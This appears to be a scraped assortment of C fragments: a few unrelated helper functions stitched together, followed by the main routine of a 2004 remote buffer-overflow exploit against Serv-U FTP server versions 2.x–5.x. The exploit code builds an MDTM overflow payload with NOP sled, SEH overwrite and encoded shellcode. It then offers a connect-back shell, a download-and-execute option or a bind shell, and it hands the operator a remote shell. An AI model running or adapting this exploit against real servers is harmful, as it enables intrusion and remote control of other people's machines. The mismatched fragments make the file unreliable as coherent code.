void print_types(void) { int n, count = 0; for (n = dispstart; n < num_disp; n++) { showtype(n); count++; if (maxprint > 0 && count >= maxprint) break; } }
//-------------------------------------------------------------------------------- // 打印帮助信息 //-------------------------------------------------------------------------------- void usage(char *p) { printf( "[Usage:]\n" " %s [Options] <ExeFile>\n\n" "[Options:]\n" " /a <LHZFile> Append LHZ(lha)File\n" " /o <OutFile> Output file name, default is %s\n" " /t <OSType> Target Type, default is 0\n\n", p, OutFile); showtype(); }
/* LISTHELP -- List all the (visible) ltasks in the given package in the form * of a sorted table. Used to give menus in response to ? and ?? directives. */ void listhelp (struct package *pkp, int show_invis) { static int first_col=7, maxch=20, ncol=0; register struct ltask *ltp; register char *ip, *op; char buf[4096], *list[MAXMENU]; int nltask, last_col; FILE *fp; nltask = 0; last_col = c_envgeti ("ttyncols") - 1; fp = currentask->t_stdout; op = buf; for (ltp = pkp->pk_ltp; ltp != NULL; ltp = ltp->lt_nlt) { if (ltp->lt_flags & LT_INVIS && show_invis == NO) continue; if (nltask >= MAXMENU) cl_error (E_UERR, "too many ltasks in menu"); /* Get task name. */ list[nltask++] = op; for (ip=ltp->lt_lname; (*op = *ip++); op++) ; /* If special task, add character defining task type. */ if (showtype()) { if (ltp->lt_flags & LT_DEFPCK) *op++ = '.'; else if (ltp->lt_flags & LT_PSET) *op++ = '@'; } *op++ = EOS; } /* Sort the list and output the table. */ if (nltask) { strsort (list, nltask); strtable (fp, list, nltask, first_col, last_col, maxch, ncol); } }
int main(int argc, char **argv) { struct sockaddr_in sa, server, client; #ifndef UNIX WSADATA wsd; #endif SOCKET s, s2, s3; int iErr, ret, len; char szRecvBuff[MAX_LEN]; int i,j; int iType =DEFTYPE, iPort=FTPPORT; char *ip=NULL, *pUser=DEFUSER, *pPass=DEFPASS, *cbHost=NULL, *url; char user[128], pass[128]; BOOL bCb=FALSE,bUrl=FALSE, bLocal=TRUE, b2x=FALSE; unsigned short shport=SHELLPORT, shport2=0; unsigned long cbip; unsigned int timeout=5000, Reuse; char penetrate[255],cbHost2[20]; printf( "Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V%s (2004-01-07)\r\n" "Bug find by bkbll ([email protected]), Code by lion ([email protected])\r\n" "Welcome to HUC website http://www.cnhonker.com\r\n\n" , VERSION); if(argc < 2) { usage(argv[0]); return 1; } else if(argc == 2 && argv[1][1] == 't') { showtype(); return 1; } for(i=1;i<argc;i+=2) { if(strlen(argv[i]) != 2) { usage(argv[0]); return -1; } // check parameter if(i == argc-1) { usage(argv[0]); return -1; } switch(argv[i][1]) { case 'i': ip=argv[i+1]; break; case 't': iType = atoi(argv[i+1]); break; case 'f': iPort=atoi(argv[i+1]); break; case 'p': pPass = argv[i+1]; break; case 'u': pUser=argv[i+1]; break; case 's': shport=atoi(argv[i+1]); break; case 'c': cbHost=argv[i+1]; bCb=TRUE; break; case 'd': url = argv[i+1]; bUrl=TRUE; break; } } if((!ip) || (!user) || (!pass)) { usage(argv[0]); printf("[-] Invalid parameter.\n"); return -1; } if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) ) { usage(argv[0]); printf("[-] Invalid type.\n"); return -1; } if(iPort <1 || iPort >65535 || shport <1 || shport > 65535) { usage(argv[0]); printf("[-] Invalid port.\n"); return -1; } if(bUrl) { if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 255) { usage(argv[0]); printf("[-] Invalid url. Must start with 'http://','ftp://' and <255 bytes.\n"); return -1; } } if(strstr(targets[iType].szDescription, "2.x")) { b2x = TRUE; printf("[*] Attack Target is Serv-U 2.x.\r\n"); } else { printf("[*] Attack Target is Serv-U 3.x/4.x/5.x.\r\n"); } _snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser); user[sizeof(user)-1]='\0'; _snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass); pass[sizeof(pass)-1]='\0'; szSend[0] = user; //user szSend[1] = pass; //pass szSend[2] = penetrate; //pentrate szSend[3] = szCommand; //shellcode // Penetrate through the firewall. if(bCb && shport > 1024) { strncpy(cbHost2, cbHost, 20); for(i=0;i<strlen(cbHost); i++) { if(cbHost[i] == '.') cbHost2[i] = ','; } sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256); //printf("%s", penetrate); } else { sprintf(penetrate,"TYPE I\r\n"); } // fill the "MDTM" command strcpy(szCommand, "MDTM 20031111111111+"); // fill the egg for(i=0; i<SEH_OFFSET; i++) { strcat(szCommand, "\x90"); } // ret addr if(b2x) { // fill the egg if(strstr(targets[iType].szDescription, "<")) { j = 8; } else { j = 4; } for(i=0; i<j; i++) { strcat(szCommand, "\x90"); } memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4); memcpy(&szCommand[READ_OFFSET], &READ_ADDR, 4); // fill the decode strcat(szCommand, decode); } else { // fill the seh for(i=0; i<0x10*1; i+=8) //for(i=0; i<1; i++) { memcpy(&szCommand[strlen(szCommand)], &JMP_OVER, 4); memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4); } // fill the decode strcat(szCommand, decode2); } // fill the space strcat(szCommand, " "); // fill the egg for(i=0; i<0x10; i++) { strcat(szCommand, "\x90"); } // fill the shellcode start sign strcat(szCommand, sc_start); // fill the shellcode if(bCb) { // connectback shellcode shport2 = htons(shport)^(u_short)0x9999; cbip = inet_addr(cbHost)^0x99999999; memcpy(&cbsc[PORT_OFFSET], &shport2, 2); memcpy(&cbsc[IP_OFFSET], &cbip, 4); strcat(szCommand, cbsc); } else if(bUrl) { memset(downloadurl, 0, sizeof(downloadurl)); // download url exec shellcode for(i=0;i<strlen(url);i++) { downloadurl[i] = url[i] ^ 0x99; } downloadurl[i] ^= 0x99; strcat(szCommand, dusc); strcat(szCommand, downloadurl); } else { // rebind shellcode shport2 = htons(shport)^(u_short)0x9999; memcpy(&sc[BIND_OFFSET], &shport2, 2); strcat(szCommand, sc); } // fill the shellcode end sign strcat(szCommand, sc_end); // send end strcat(szCommand, "\r\n"); if(strlen(szCommand) >= sizeof(szCommand)) { printf("[-] stack buffer overflow.\n"); return -1; } //printf("send size %d:%s", strlen(szCommand), szCommand); //printf("buffsize %d\r\n", strlen(szCommand)-5-2); #ifndef UNIX __try #endif { #ifndef UNIX if (WSAStartup(MAKEWORD(1,1), &wsd) != 0) { printf("[-] WSAStartup error:%d\n", WSAGetLastError()); __leave; } #endif s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(s == INVALID_SOCKET) { printf("[-] Create socket failed:%d",GetLastError()); __leave; } sa.sin_family=AF_INET; sa.sin_port=htons((USHORT)iPort); #ifndef UNIX sa.sin_addr.S_un.S_addr=inet_addr(ip); #else sa.sin_addr.s_addr=inet_addr(ip); #endif setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int)); iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa)); if(iErr == SOCKET_ERROR) { printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError()); __leave; } printf("[+] Connect to %s:%d success.\n", ip, iPort); if(bCb) { Sleep(500); s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); server.sin_family=AF_INET; #ifndef UNIX server.sin_addr.S_un.S_addr=inet_addr(cbHost); //server.sin_addr.s_addr=INADDR_ANY; #else server.sin_addr.s_addr=inet_addr(cbHost); #endif server.sin_port=htons((unsigned short)shport); setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int)); Reuse = 1; setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse)); if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR) { printf("[-] Bind port on %s:%d error.\n", cbHost, shport); printf("[-] You must run nc get the shell.\n"); bLocal = FALSE; //closesocket(s2); //__leave; } else { printf("[+] Bind port on %s:%d success.\n", cbHost, shport); listen(s2, 1); } } for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++) { memset(szRecvBuff, 0, sizeof(szRecvBuff)); iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0); if(iErr == SOCKET_ERROR) { printf("[-] Recv buffer error:%d.\n", WSAGetLastError()); __leave; } printf("[+] Recv: %s", szRecvBuff); if(szRecvBuff[0] == '5') { printf("[-] Server return a error Message.\r\n"); __leave; } iErr = send(s, szSend[i], strlen(szSend[i]),0); if(iErr == SOCKET_ERROR) { printf("[-] Send buffer error:%d.\n", WSAGetLastError()); __leave; } if(i==sizeof(szSend)/sizeof(szSend[0])-1) printf("[+] Send shellcode %d bytes.\n", iErr); else printf("[+] Send: %s", szSend[i]); } if(bUrl) { printf("[+] Target Download the file and exec: %s\r\n", url); printf("[+] Success? Maybe!\r\n"); } else { printf("[+] If you don't have a shell it didn't work.\n"); if(bCb) { if(bLocal) { printf("[+] Wait for shell...\n"); len = sizeof(client); s3 = accept(s2, (struct sockaddr*)&client, &len); if(s3 != INVALID_SOCKET) { printf("[+] Exploit success! Good luck! :)\n"); printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n"); shell(s3); } } } else { printf("[+] Connect to shell...\n"); Sleep(1000); s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); server.sin_family = AF_INET; server.sin_port = htons(shport); server.sin_addr.s_addr=inet_addr(ip); ret = connect(s2, (struct sockaddr *)&server, sizeof(server)); if(ret!=0) { printf("[-] Exploit seem failed.\n"); __leave; } printf("[+] Exploit success! Good luck! :)\n"); printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n"); shell(s2); } } } #ifdef UNIX exit_try: #endif #ifndef UNIX __finally #endif { if(s != INVALID_SOCKET) closesocket(s); if(s2 != INVALID_SOCKET) closesocket(s2); if(s3 != INVALID_SOCKET) closesocket(s3); #ifndef UNIX WSACleanup(); #endif } return 0; }